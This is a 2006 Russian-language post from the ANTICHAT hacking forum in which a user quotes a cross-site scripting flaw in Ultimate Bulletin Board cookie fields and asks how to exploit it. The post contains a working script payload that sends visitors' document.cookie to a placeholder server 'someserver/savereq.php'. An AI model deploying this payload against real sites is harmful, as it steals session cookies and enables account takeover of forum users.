HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2  
Старый 13.01.2006, 11:54
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
С нами: 10787308

Репутация: 409
По умолчанию

Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример:

username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>


вот нарыд это но немогу понять как это использовать
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли уязвимости в Ultimate Bulletin Board 6.05? Zazil Уязвимости CMS / форумов 4 18.06.2006 03:00
Народ умоляю дайте не битый линк на форум Open Bulletin Board fra_f Болталка 2 24.09.2005 04:38
Как хранит hash Open Bulletin Board fra_f Уязвимости CMS / форумов 2 23.09.2005 23:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.